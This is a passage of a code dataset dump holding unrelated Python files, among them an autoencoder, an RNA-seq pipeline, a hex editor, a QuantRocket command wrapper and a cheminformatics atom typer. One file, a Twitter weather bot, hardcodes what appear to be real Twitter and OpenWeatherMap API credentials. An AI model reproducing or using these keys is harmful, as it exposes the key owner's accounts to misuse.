0.1)),'B2':tf.Variable(tf.truncated_normal([26], stddev = 0.1))}\n\ndef autoencoder():\n    #encoder portion\n    bl1 = tf.nn.sigmoid(tf.matmul(x, weightsE['W1']) + biasesE['B1'])\n    bl2 = tf.nn.sigmoid(tf.matmul(bl1, weightsE['W2']) + biasesE['B2'])\n    bl3 = tf.nn.sigmoid(tf.matmul(bl2, weightsE['W3']) + biasesE['B3'])\n\n    # decoder portion: needs fixing, currently just a copy of the encoder above\n    el1 = tf.nn.sigmoid(tf.matmul(bl3, weightsD['W1']) + biasesD['B1'])\n    el2 = tf.nn.sigmoid(tf.matmul(el1, weightsD['W2']) + biasesD['B2'])\n\n    return el2\n\nres = autoencoder()\n\ncost = tf.reduce_mean(tf.pow(res - y, 2))\noptimizer = tf.train.RMSPropOptimizer(0.5).minimize(cost)\n\nwith tf.Session() as sess:\n    sess.run(tf.global_variables_initializer())\n    for e in range(EPOCHS):\n        x_batch = next_batch(internal, 15)\n        _, c = sess.run([optimizer, cost],feed_dict={x:x_batch, y:x_batch})\n        print(c)\n        costLog.append(c)\n\n    #test suite\n    test = np.array([ 0. ,   0. ,   0. ,   0. ,   0. ,   0. ,   0. ,   0. ,   0. ,\n         0. ,   0. ,   0. ,   0. ,   0. ,  17. ,   0. ,   0. ,   0. ,\n         0. ,   0. ,   0. ,   0. ,   0. ,   0. ,   2.5,   0.])\n    test = np.reshape(test, (1,26))\n    yVal = (res.eval(feed_dict={x:test}))\n    minVal = np.argmax(np.array([cosDistance(yVal,extVec['vec']) for extVec in external]))\n    print(external[minVal])\n    print(internals[minVal])\n\nplt.plot(costLog)\nplt.show()\n","sub_path":"stringmatching/autoencoder.py","file_name":"autoencoder.py","file_ext":"py","file_size_in_byte":2772,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"427079527","text":"#!/usr/bin/env python\n# coding=utf-8\n# author: zengyuetian\n# This code is for learning and communication only; please do not use it for commercial purposes.\n# Data structure for residential community (xiaoqu) information\n\n\nclass XiaoQu(object):\n    def __init__(self, district, area, name, price, on_sale, age, deal, rent, layout,\n                 type, fee, property_company, builder, total_block, total_house):\n        self.district = district\n        self.area = area\n        self.price = price\n        self.name = name\n        self.on_sale = on_sale\n        self.age = r'' if not age else age\n        self.deal = r'' if not deal else deal\n        self.rent = r'' if not rent else rent\n        self.layout = r'' if not layout else layout\n        self.type = r'' if not type else type\n        self.fee = r'' if not fee else fee\n        self.property_company = r'' if not property_company else property_company\n        self.builder = r'' if not builder else builder\n        self.total_block = r'' if not total_block else total_block\n        self.total_house = r'' if not total_house else total_house\n\n    def text(self):\n        return self.district + \",\" + \\\n               self.area + \",\" + \\\n               self.name + \",\" + \\\n               self.price + \",\" + \\\n               self.on_sale + \",\" + \\\n               self.age + \",\" + \\\n               self.deal + \",\" + \\\n               self.rent + \",\" + \\\n               self.layout + \",\" + \\\n               self.type + \",\" + \\\n               self.fee + \",\" + \\\n               self.property_company + \",\" + \\\n               self.builder + \",\" + \\\n               self.total_block + \",\" + \\\n               self.total_house\n","sub_path":"lib/item/xiaoqu.py","file_name":"xiaoqu.py","file_ext":"py","file_size_in_byte":1619,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"104624586","text":"#!/usr/bin/env python\n\"\"\"\nMarijn Schipper, Ioannis Vasilas\n\nScript to run all the scripts\nargv[1] = path to folder with fastq files \n\"\"\"\n\n\nfrom sys import argv\nimport subprocess\nimport os\nimport Fastq_module_2 as fq\nimport hisat as h2\nimport samtools as st\nimport htseq \nimport trimfix as tfix\nimport gff_parser as gp\n\n\ndef pipe(input_path, out_trim, out_stats, out_bias, ref_genome_path, \\\n    path_to_gff_file, tr_setting, version_name):\n    \"\"\"Returns 
read counts from rna-seq fastq files, mapped to ref genome\n input: input_path - path to gzipped fastq files(str)\n out_trim - folder name for trim output (str)(def = out_trim)\n out_bias - folder name for bias output (str)(def = out_bias)\n out_stats - folder name for out stats (str)(def = out_stats)\n ref_genome - path to reference genome (str)\n path_to_gff_file - path to gene models .gff file (str)\n tr_set - determines whether to trim (T) or not (F) (Boolean)\n output: tab delimited txt files (htseq std output, see htseq)\n \"\"\"\n #Bool switch for trimming\n if tr_setting:\n files = fq.Fastqrunner(input_path, out_trim, out_stats, out_bias,\\\n tr_setting)\n #delete intermediate data\n if os.path.exists(out_bias):\n command = \"rm -r {}\".format(out_bias)\n run = subprocess.check_output(command,shell = True)\n files = \"./{}/\".format(out_trim)\n else:\n files = './fastq_links/'\n #sort different filenames into correlating group lists\n replicate_list = h2.group_replicates(tr_setting, treatments = \\\n [\"Cf\", \"Mock1\", \"Mock2\", \"Sc\"], timepoints = [\"12\", \"24\", \"48\"])\n #build index with Hisat 2 and ref genome\n index = h2.build_hisat2_index(ref_genome_path, version_name)\n #map and count reads for each trimmed fastq pair in input path\n for (pair1, pair2) in replicate_list:\n sam_file = h2.run_hisat2(files, pair1, pair2, index, tr_setting)\n bam_file = st.run_samtools(sam_file, out_sam)\n path_to_bam = \"./{}/{}\".format(out_sam, bam_file)\n htseq.run_htseq_count(path_to_bam, path_to_gff_file, out_htseq)\n #remove redundant bam files\n st.remove_file(path_to_bam)\n gp.parse_htseq_count_output(out_gcount, path_to_gff_file, \"./{}/\".format(out_htseq))\n return\n\nif __name__==\"__main__\":\n #path to gzipped fastqfiles\n input_path = argv[1]\n tr_setting = argv[2]\n #set necessary variables\n ref_genome_path = argv[3]\n path_to_gff_file = argv[4]\n version_name = argv[5]\n if tr_setting:\n tr_add = '_trimmed'\n else:\n tr_add = '_untrimmed'\n \n #set output paths\n out_bias = 'bias'\n out_trim = 'trim'\n out_stats = 'stats_{}'.format(tr_add)\n out_sam = 'out_sam_{}{}'.format(version_name, tr_add)\n out_gcount = '{}{}'.format(version_name, tr_add)\n out_htseq = 'out_htseq_{}{}'.format(version_name, tr_add)\n \n #run pipe\n pipe(input_path, out_trim, out_stats, out_bias, ref_genome_path,\\\n path_to_gff_file, tr_setting, version_name)\n","sub_path":"Final_pipe.py","file_name":"Final_pipe.py","file_ext":"py","file_size_in_byte":3077,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"312274579","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n#\n# stagnatingIssues.py\n# \n# Copyright 2012 Mark Mikofski \n# \n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation; either version 2 of the License, or\n# (at your option) any later version.\n# \n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n# \n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston,\n# MA 02110-1301, USA.\n# \n# \n\nimport account\nimport time\nfrom time import mktime\nfrom datetime import datetime, timedelta, date\n\ndef get_date(d):\n    return datetime.fromtimestamp(mktime(time.strptime(d, '%Y-%m-%dT%H:%M:%SZ'))).date()\n\ndef get_stagnatingIssues(account_name, assignee_email, token, include_archived, issueAge, assignee_name):\n\n    stagnatingIssues_number = 0\n\n    a = account.Account(account_name, token, include_archived)\n\n    todays_date = date.today()\n\n    html_email_body = ''\n\n    projs = a.projects()\n\n    printed_project_name = False\n\n    something_to_print = False\n\n    for proj in projs:\n\n        printed_project_name = False\n        issues = proj.issuesAssignedTo(assignee_email)\n\n        if issues:\n\n            for i in issues:\n\n                if (i.assignee_email == assignee_email) and (i.status != 'Closed') and (get_date(i.updated_at) + timedelta(days=issueAge) < todays_date):\n                    something_to_print = True\n                    stagnatingIssues_number += 1\n                    printable_subject = i.subject.replace(u\"\\u25ba\", \"&#9658;\").encode('ascii', 'ignore')\n\n                    if printed_project_name == False:\n                        html_email_body += '<li>' + proj.name + '</li>\n<ul>\n'\n                        printed_project_name = True\n\n                    html_email_body += '<li>' + printable_subject + ' - Last update: ' + str(get_date(i.updated_at)) + '</li>\n'\n\n            if printed_project_name == True:\n                html_email_body += '</ul>\n'\n\n        html_email_body += '\n'\n\n    if something_to_print == True:\n        if stagnatingIssues_number == 1:\n            html_email_body = '<h3>There is ' + str(stagnatingIssues_number) + ' issue that has been stagnating for 90+ days assigned to ' + assignee_name + '.</h3>\n<ul>\n' + html_email_body\n        else:\n            html_email_body = '<h3>There are ' + str(stagnatingIssues_number) + ' issues that have been stagnating for 90+ days assigned to ' + assignee_name + '.</h3>\n<ul>\n' + html_email_body\n    else:\n        html_email_body = '<h3>Good job ' + assignee_name + '! there are 0 stagnating Sifter issues assigned to you.</h3>\n<ul>\n' + html_email_body\n    \n    html_email_body = '\n<p>This is an automatic reminder of forgotten Sifter issues. Some are legitimate bugs and others stop being applicable as we make changes. Keeping Sifter clean helps prioritizing issue fixes.</p>
          \\n' + html_email_body \n\n return html_email_body, str(stagnatingIssues_number)","sub_path":"stagnatingIssues.py","file_name":"stagnatingIssues.py","file_ext":"py","file_size_in_byte":3425,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"18047671","text":"# Copyright 2017-2023 QuantRocket - All Rights Reserved\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\"\"\"\nFunctions for running custom scripts.\n\nFunctions\n---------\nexecute_command\n Execute a Python function or arbitrary shell command on a satellite service.\n\nNotes\n-----\nUsage Guide:\n\n* Custom Scripts: https://qrok.it/dl/qr/satellite\n\"\"\"\nimport sys\nfrom quantrocket.houston import houston\nfrom typing import overload\nfrom quantrocket.utils._typing import FilepathOrBuffer, Any, Union\nfrom quantrocket._cli.utils.output import json_to_cli\nfrom quantrocket._cli.utils.files import write_response_to_filepath_or_buffer\nfrom quantrocket._cli.utils.parse import dict_strs_to_dict, dict_to_dict_strs\n\n__all__ = [\n \"execute_command\",\n]\n\n@overload\ndef execute_command(\n cmd: str,\n return_file: str,\n filepath_or_buffer: FilepathOrBuffer,\n params: dict[str, Any] = None,\n service: str = \"satellite\"\n ) -> None:\n pass\n\n@overload\ndef execute_command(\n cmd: str,\n return_file: str = None,\n filepath_or_buffer: FilepathOrBuffer = None,\n params: dict[str, Any] = None,\n service: str = \"satellite\"\n ) -> dict[str, str]:\n pass\n\ndef execute_command(cmd, return_file=None, filepath_or_buffer=None,\n params=None, service=\"satellite\"):\n \"\"\"\n Execute a Python function or arbitrary shell command on a satellite service.\n\n Parameters\n ----------\n cmd: str, required\n the shell command to run, or the Python function in dot notation (must\n start with \"codeload.\" to be interpreted as a Python function).\n\n return_file : str, optional\n the path of a file to be returned after the command completes\n\n filepath_or_buffer : str, optional\n the location to write the return_file (omit to write to stdout)\n\n params : dict of PARAM:VALUE, optional\n one or more params to pass to the Python function (pass as {param:value})\n\n service : str, optional\n the service name (default 'satellite')\n\n Returns\n -------\n dict or None\n None if return_file, otherwise status message. If cmd uses Python dot\n notation and the Python function returns a value, it will be included in\n the status message as the \"output\" key. 
Return values must be JSON-serializable.\n\n Notes\n -----\n Usage Guide:\n\n * Custom Scripts: https://qrok.it/dl/qr/satellite\n\n Examples\n --------\n Run a Python function called 'create_calendar_spread' defined in '/codeload/scripts/combos.py'\n and pass it arguments:\n\n >>> execute_command(\"codeload.scripts.combos.create_calendar_spread\",\n params={\"universe\":\"cl-fut\", \"contract_months\":[1,2]})\n\n Run a Python function called 'calculate_signal' defined in '/codeload/scripts/custom.py'\n and retrieve the return value:\n\n >>> response = execute_command(\"codeload.scripts.custom.calculate_signal\")\n >>> if response[\"status\"] == \"success\":\n print(response[\"output\"])\n\n Run a backtrader backtest and save the performance chart to file:\n\n >>> execute_command(\"python /codeload/backtrader/dual_moving_average.py\",\n return_file=\"/tmp/backtrader-plot.pdf\"\n outfile=\"backtrader-plot.pdf\")\n \"\"\"\n _params = {}\n if not service:\n raise ValueError(\"a service is required\")\n if not cmd:\n raise ValueError(\"a command is required\")\n _params[\"cmd\"] = cmd\n if params:\n _params[\"params\"] = dict_to_dict_strs(params)\n if return_file:\n _params[\"return_file\"] = return_file\n\n if not service.startswith(\"satellite\"):\n raise ValueError(\"service must start with 'satellite'\")\n\n response = houston.post(\"/{0}/commands\".format(service), params=_params, timeout=60*60*24)\n\n houston.raise_for_status_with_json(response)\n\n if return_file:\n filepath_or_buffer = filepath_or_buffer or sys.stdout\n write_response_to_filepath_or_buffer(filepath_or_buffer, response)\n else:\n return response.json()\n\ndef _cli_execute_command(*args, **kwargs):\n params = kwargs.get(\"params\", None)\n if params:\n kwargs[\"params\"] = dict_strs_to_dict(*params)\n return json_to_cli(execute_command, *args, **kwargs)\n","sub_path":"quantrocket/satellite.py","file_name":"satellite.py","file_ext":"py","file_size_in_byte":4729,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"200975976","text":"\nimport os;\n\ndef getDirectoryList(path):\n directoryList = []\n\n #return nothing if path is a file\n if os.path.isfile(path):\n return []\n\n #add dir to directorylist if it contains .txt files\n if len([f for f in os.listdir(path) if f.endswith('.wav')])>0:\n directoryList.append(path)\n\n for d in os.listdir(path):\n new_path = os.path.join(path, d)\n if os.path.isdir(new_path):\n directoryList += getDirectoryList(new_path)\n\n return directoryList\n\nsrc = '../VocalSetWAV'\n\nwavFolders = getDirectoryList(src)\n\nfor folder in wavFolders:\n print(folder)\n \n os.system('python -m crepe -s 5 ' + folder)\n\n","sub_path":"crepe_all.py","file_name":"crepe_all.py","file_ext":"py","file_size_in_byte":659,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"255360004","text":"import tkinter as tk\nfrom tkinter.filedialog import askopenfilename, asksaveasfilename\nfrom tkinter import messagebox\nimport subprocess as sp\nimport sys\n\npath = \"\"\nin_file = \"\"\nout_file = \"\"\n\n\ndef save_as(args):\n name = asksaveasfilename()\n t = T.get('1.0', 'end')\n arg = ['xxd', '-r', '-g1', '-', name]\n proc = sp.run(arg, input=t.encode(\"UTF-8\"), stdout=sp.PIPE)\n if proc.returncode != 0:\n T.delete('1.0', 'end')\n messagebox.showinfo(\"Error\", \"Can't save file\")\n\n\ndef save(args):\n print(\"save\")\n global path, out_file\n if out_file != \"\":\n path = out_file\n if path != \"\":\n 
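# rebuild the binary file from the hex-dump text via 'xxd -r' and write it to the current path\n        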
print(\"save\")\n t = T.get('1.0', 'end')\n arg = ['xxd', '-r', '-g1', '-', path]\n proc = sp.run(arg, input=t.encode(\"UTF-8\"), stdout=sp.PIPE)\n if proc.returncode != 0:\n T.delete('1.0', 'end')\n messagebox.showinfo(\"Error\", \"Can't save file\")\n\n\ndef fun(args):\n print(\"ok\")\n global path, in_file, out_file\n if in_file == \"\":\n path = askopenfilename()\n else:\n path = in_file\n in_file = \"\"\n out_file = \"\"\n print(path)\n if path:\n splt = path.split(\"/\")\n F.master.title(splt[-1])\n arg = [\"xxd\", \"-g1\", path]\n proc = sp.run(arg, stdout=sp.PIPE)\n if proc.returncode != 0:\n T.delete('1.0', 'end')\n messagebox.showinfo(\"Error\", \"Can't open file\")\n else:\n T.delete('1.0', 'end')\n T.insert('1.0', proc.stdout)\n\n\ndef undo(args):\n try:\n T.edit_undo()\n except Exception:\n pass\n\n\ndef redo(args):\n try:\n T.edit_redo()\n except Exception:\n pass\n\n\nF = tk.Frame()\nF.master.title(\"main window\")\nF.master.rowconfigure(1, weight=1)\nF.master.columnconfigure(1, weight=1)\nF.master.rowconfigure(0, weight=0)\nF.master.columnconfigure(0, weight=0)\nF.grid(sticky=\"NEWS\", row=0, column=0)\nF.rowconfigure(0, weight=1)\nF.columnconfigure(0, weight=1)\nF2 = tk.Frame(master=F)\nF2.grid(sticky=\"W\", column=0, row=0)\nF2.master.rowconfigure(0, weight=0)\nF2.master.columnconfigure(0, weight=0)\nF2.master.columnconfigure(1, weight=0)\nF2.master.columnconfigure(2, weight=0)\nF2.master.columnconfigure(3, weight=0)\nF2.master.columnconfigure(4, weight=0)\nB1 = tk.Button(master=F2, text=\"Save as\")\nB1.bind(\"\", save_as)\nB1.grid(sticky=\"W\", column=2, row=0)\nB2 = tk.Button(master=F2, text=\"Save\")\nB2.bind(\"\", save)\nB2.grid(sticky=\"W\", column=1, row=0)\nB3 = tk.Button(master=F2, text=\"Open\")\nB3.bind(\"\", fun)\nB3.grid(sticky=\"W\", column=0, row=0)\nB4 = tk.Button(master=F2, text=\"Undo\")\nB4.bind(\"\", undo)\nB4.grid(sticky=\"W\", column=3, row=0)\nB5 = tk.Button(master=F2, text=\"Redo\")\nB5.bind(\"\", redo)\nB5.grid(sticky=\"W\", column=4, row=0)\nscrl = tk.Scrollbar(F)\nscrl.grid(sticky=\"NS\", row=1, column=1)\nT = tk.Text(master=F, height=24, width=80, font=(\"Source Code Pro\", \"14\"),\n yscrollcommand=scrl.set, undo=True)\nT.grid(sticky=\"NEWS\", column=0, row=1)\nargv = sys.argv\nif len(argv) == 2:\n in_file = argv[1]\n fun(1)\nelif len(argv) == 3:\n in_file = argv[1]\n fun(1)\n out_file = argv[2]\n save(1)\ntk.mainloop()\n","sub_path":"task_t.py","file_name":"task_t.py","file_ext":"py","file_size_in_byte":3179,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"18149975","text":"# Dependencies\nimport tweepy\nimport time\nimport json\nimport random\nimport requests as req\nimport datetime\n\n# Twitter API Keys\nconsumer_key = \"Ed4RNulN1lp7AbOooHa9STCoU\"\nconsumer_secret = \"P7cUJlmJZq0VaCY0Jg7COliwQqzK0qYEyUF9Y0idx4ujb3ZlW5\"\naccess_token = \"839621358724198402-dzdOsx2WWHrSuBwyNUiqSEnTivHozAZ\"\naccess_token_secret = \"dCZ80uNRbFDjxdU2EckmNiSckdoATach6Q8zb7YYYE5ER\"\n\n# Weather API\napi_key = \"25bc90a1196e6f153eece0bc0b0fc9eb\"\n\n\n# Create a function that gets the weather in London and Tweets it\ndef WeatherTweet():\n\n # Construct a Query URL for the OpenWeatherMap\n url = \"http://api.openweathermap.org/data/2.5/weather?\"\n city = \"London\"\n units = \"imperial\"\n query_url = url + \"appid=\" + api_key + \"&q=\" + city + \"&units=\" + units\n\n # Perform the API call to get the weather\n weather_response = req.get(query_url)\n weather_json = weather_response.json()\n 
print(weather_json)\n\n # Twitter credentials\n auth = tweepy.OAuthHandler(consumer_key, consumer_secret)\n auth.set_access_token(access_token, access_token_secret)\n api = tweepy.API(auth, parser=tweepy.parsers.JSONParser())\n\n # Tweet the weather\n api.update_status(\n \"London Weather as of %s: %s F\" %\n (datetime.datetime.now().strftime(\"%I:%M %p\"),\n weather_json[\"main\"][\"temp\"]))\n\n # Print success message\n print(\"Tweeted successfully, sir!\")\n\n\n# Set timer to run every 1 hour\nwhile(True):\n WeatherTweet()\n time.sleep(3600)\n","sub_path":"01-ClassContent/07-Social-Analytics/1/Supplemental/Solved/Stu_Weather_Tweets/Weather_Tweets.py","file_name":"Weather_Tweets.py","file_ext":"py","file_size_in_byte":1467,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"134904750","text":"def divisors(x):\n div = 1\n divisors = []\n while div < x:\n if x % div == 0:\n divisors = divisors + [div]\n\n div = div + 1\n\n return divisors\n\nn = input(\"Enter n : \")\nn = int(n)\n\nprint(divisors(n))\n","sub_path":"week3/2-Resolve-with-Functions/divisors(x).py","file_name":"divisors(x).py","file_ext":"py","file_size_in_byte":231,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"560770081","text":"from django.conf.urls import url\nfrom . import views\n\nurlpatterns = [\n url(r'^create/$',\n views.user_create,\n name='user_create'),\n url(r'^confirm/([1-9]\\d*)/([0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12})/$',\n views.user_confirm,\n name='user_confirm'),\n url(r'^login/$',\n views.user_login,\n name='user_login'),\n url(r'^([1-9]\\d*)/$',\n views.user_home,\n name='user_home'),\n]\n\n","sub_path":"bfuser/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":459,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"580980132","text":"#!/usr/bin/env python\n\n# type atoms of a molecule a la atom pairs\n# (nb. pi electrons if > 0, elt. 
symbol, nbHA neighbors)\n\nfrom __future__ import print_function\n\nimport common, os, rdkit, sys, time\nfrom rdkit import Chem\nfrom rdkit import RDConfig\nfrom rdkit.Chem import AllChem, Descriptors\nfrom rdkit.Chem.AtomPairs import Pairs\n\ndef RobustSmilesMolSupplier(filename):\n with open(filename) as f:\n for line in f:\n words = line.split()\n smile = words[0]\n name = \" \".join(words[1:]) # everything after the SMILES string\n yield (name, Chem.MolFromSmiles(smile))\n\ndef SdfMolSupplier(fn):\n for mol in Chem.SDMolSupplier(fn):\n if mol:\n name = mol.GetProp('_Name')\n yield (name, mol)\n\ndef nb_heavy_atom_neighbors(a):\n res = 0\n for neighb in a.GetNeighbors():\n if neighb.GetAtomicNum() != 1:\n res += 1\n return res\n\nPeriodicTable = Chem.GetPeriodicTable()\n\ndef type_atom(a):\n nb_pi_electrons = Pairs.Utils.NumPiElectrons(a)\n symbol = PeriodicTable.GetElementSymbol(a.GetAtomicNum())\n nbHA = nb_heavy_atom_neighbors(a)\n res = None\n if nb_pi_electrons > 0:\n res = \"%d%s%d\" % (nb_pi_electrons, symbol, nbHA)\n else:\n res = \"%s%d\" % (symbol, nbHA)\n return res\n\ndef encode_molecule(m):\n return map(type_atom, m.GetAtoms())\n\ndef print_encoded_atoms(atoms):\n for i, a in enumerate(atoms):\n print(\"%d %s\" % (i, a))\n\nif __name__ == '__main__':\n before = time.time()\n argc = len(sys.argv)\n if argc != 2:\n print(\"usage: %s input.{smi|sdf}\" % sys.argv[0])\n sys.exit(1)\n input = sys.argv[1]\n mol_supplier = None\n if input.endswith(\".smi\"):\n mol_supplier = RobustSmilesMolSupplier\n if input.endswith(\".sdf\"):\n mol_supplier = SdfMolSupplier\n count = 0\n for name, mol in mol_supplier(input):\n print(\"#atoms:%d %s\" % (mol.GetNumAtoms(), name))\n print_encoded_atoms(encode_molecule(mol))\n common.print_bonds(mol)\n common.print_distance_matrix(mol)\n count += 1\n after = time.time()\n dt = after - before\n print(\"%d molecules at %.2f mol/s\" % (count, count / dt), file=sys.stderr)\n","sub_path":"bin/type_atoms.py","file_name":"type_atoms.py","file_ext":"py","file_size_in_byte":2212,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"501041053","text":"# -*- coding: utf-8 -*-\n\"\"\"\nSpyder Editor\n\nThis is a temporary script file.\n\"\"\"\n\nimport matplotlib.pyplot as plt\nfrom sklearn.datasets import make_classification\nfrom sklearn.decomposition import PCA\nimport pandas as pd\nimport numpy as np\n#__import__(\"imbalanced-learn.oversampling\")\nfrom imblearn.over_sampling import SMOTE\n \nX=pd.read_csv(\"train_without_smote_mj.csv\")\ny=X['target']\ndel X['target']\nmethod=SMOTE(ratio = 0.33)\nX_resampled = []\ny_resampled = []\nX_res_vis = []\nX_res, y_res = method.fit_sample(X, y)\nsum(y_res==1)\nsum(y==1)\nX_res=pd.DataFrame(X_res)\ny_res=pd.DataFrame(y_res)\nop=pd.concat([X_res.reset_index(drop=True),y_res],axis=1)\nop.to_csv(\"train_with_smote31.csv\",index=True)","sub_path":"ClassImbalance_SMOTE.py","file_name":"ClassImbalance_SMOTE.py","file_ext":"py","file_size_in_byte":696,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"11129568","text":"\"\"\" The implementation of the interface for Connectome File Metadata \"\"\"\n# Copyright (C) 2009-2010, Ecole Polytechnique Federale de Lausanne (EPFL) and\n# University Hospital Center and University of Lausanne (UNIL-CHUV)\n#\n# Modified BSD License\n\n# Enthought library imports\nfrom enthought.traits.api import HasTraits, Str, implements, Int, Button\nfrom enthought.traits.ui.api import View, Item, 
Group, spring\n\n# ConnectomeViewer import\nfrom interfaces.i_meta import IMeta\n\n# Logging import\nimport logging\nlogger = logging.getLogger('root.'+__name__)\n\nclass Meta(HasTraits):\n \"\"\" The implementation for Connectome File Metadata. \"\"\"\n\n implements(IMeta)\n\n # Connectome File Format Version\n version = Str\n \n # Generator\n generator = Str\n \n # Initial creator\n initial_creator = Str\n \n # Creation date\n creation_date = Str\n \n # Modification Date\n modification_date = Str\n \n # the name of the cfile\n name = Str\n \n # Data about which species\n species = Str\n \n # Legal notice\n legal_notice = Str\n \n # A reference, e.g. where the data was used\n reference = Str\n \n # URL with more information or data source\n url = Str\n \n # Description of the content of the File\n description = Str\n \n # Nr of networks contained in this File\n nr_of_networks = Int\n \n # helper button\n openurl = Button\n \n # Group\n infogroup = Group(\n Item( 'generator', style = 'readonly', label = 'Generator:'),\n Item( 'name', style = 'readonly', label = 'Short Name:'),\n Item( 'initial_creator', style = 'readonly', label = 'Initial Creator:'),\n Item( 'creation_date', style = 'readonly', label = 'Creation Date'),\n Item( 'modification_date', style = 'readonly', label = 'Modification Date'),\n Item( '_'),\n Item( 'species', style = 'readonly', label = 'Species:'),\n #Item( 'useatlas', style = 'readonly', label = 'Use Atlas:'),\n Item( 'legal_notice', style = 'readonly', label = 'Legal Notice:'),\n Item( 'reference', style = 'readonly', label = 'References:'),\n Item( 'url', style = 'readonly', label = 'URL:'),\n Item( name = 'openurl', label = 'Open URL ...', show_label = False, visible_when = \"url != ''\"),\n spring,\n Item( 'description', style = 'custom', show_label=False, springy=True,\\\n tooltip='The description of the content of this Connectome File'),\n )\n \n traits_view = View(\n infogroup,\n title = 'Connectome File: Metadata',\n width = 500,\n height = 450,\n resizable = True,\n buttons = ['OK', ]\n )\n\n def __init__(self, filestring = None):\n \"\"\" Parses the file given as a xml string\n \n \"\"\"\n if not filestring is None:\n # invoke the parser\n self.parse_meta_xml(filestring)\n\n def _openurl_changed(self):\n \"\"\" Button was clicked \"\"\"\n from cviewer.action.help import browser_open\n browser_open(url=self.url, decorated = True)\n\n\n def parse_meta_xml(self, filestring):\n \"\"\" Parses the given file and returns True if all Traits are set.\n\n Parameters\n ----------\n filestring: StringIO\n String object to parse metadata\n\n \"\"\"\n from lxml import etree\n tree = etree.fromstring(filestring)\n \n # first child, loop through the meta-info\n nsprefix = \"{%s}\" % tree.nsmap[None]\n \n # Parse the KEYs\n for child in tree.iterchildren():\n if child.tag == (nsprefix+'viewer-meta'):\n self.version = child.attrib['version']\n for mchildren in child.iterchildren():\n if mchildren.tag == (nsprefix + 'generator'):\n if not mchildren.text is None:\n self.generator = mchildren.text\n elif mchildren.tag == (nsprefix + 'initial-creator'):\n if not mchildren.text is None:\n self.initial_creator = mchildren.text\n elif mchildren.tag == (nsprefix + 'creation-date'):\n if not mchildren.text is None:\n self.creation_date = mchildren.text\n elif mchildren.tag == (nsprefix + 'modification-date'):\n if not mchildren.text is None:\n self.modification_date = mchildren.text\n elif mchildren.tag == (nsprefix + 'name'):\n if not mchildren.text is None:\n self.name = 
mchildren.text\n elif mchildren.tag == (nsprefix + 'species'):\n if not mchildren.text is None:\n self.species = mchildren.text\n elif mchildren.tag == (nsprefix + 'legal-notice'):\n if not mchildren.text is None:\n self.legal_notice = mchildren.text\n elif mchildren.tag == (nsprefix + 'references'):\n if not mchildren.text is None:\n self.reference = mchildren.text\n elif mchildren.tag == (nsprefix + 'url'):\n if not mchildren.text is None:\n self.url = mchildren.text\n elif mchildren.tag == (nsprefix + 'description'):\n if not mchildren.text is None:\n self.description = mchildren.text\n elif mchildren.tag == (nsprefix + 'nr_of_networks'):\n if not mchildren.text is None:\n self.nr_of_networks = int(mchildren.text)\n else:\n logger.info('Tag '+ mchildren.tag + ' not found in meta.xml')\n \n#############","sub_path":"cviewer/plugins/cff/meta.py","file_name":"meta.py","file_ext":"py","file_size_in_byte":5806,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"126529847","text":"import string\nimport random\n\nfrom WordDB import WordDB\nfrom DBObject import DBObject\n\nclass User(DBObject):\n table = 'user'\n fields = { \"id\": {\n \"name\": \"id\",\n \"type\": \"int\",\n },\n \"name\": {\n \"name\": \"name\",\n \"type\": \"string\",\n },\n \"username\": {\n \"name\": \"username\",\n \"type\": \"string\",\n },\n } \n\n def __init__(self, wdb):\n DBObject.__init__(self, wdb)\n\nif __name__ == \"__main__\":\n name = ''.join(random.choice(string.ascii_uppercase + string.digits) for x in range(10))\n username = ''.join(random.choice(string.ascii_uppercase + string.digits) for x in range(10))\n wdb = WordDB()\n u = User(wdb)\n u[\"name\"] = name\n u[\"username\"] = username\n\n","sub_path":"models/User.py","file_name":"User.py","file_ext":"py","file_size_in_byte":697,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"506584768","text":"import random\n\nN = 1000000\nM = 500000\nr = 1\n\nwith open(\"in.txt\", \"w\") as f:\n f.write(\"{}\\n\".format(N))\n for i in range(N): f.write(\"{} \".format(10000000))\n 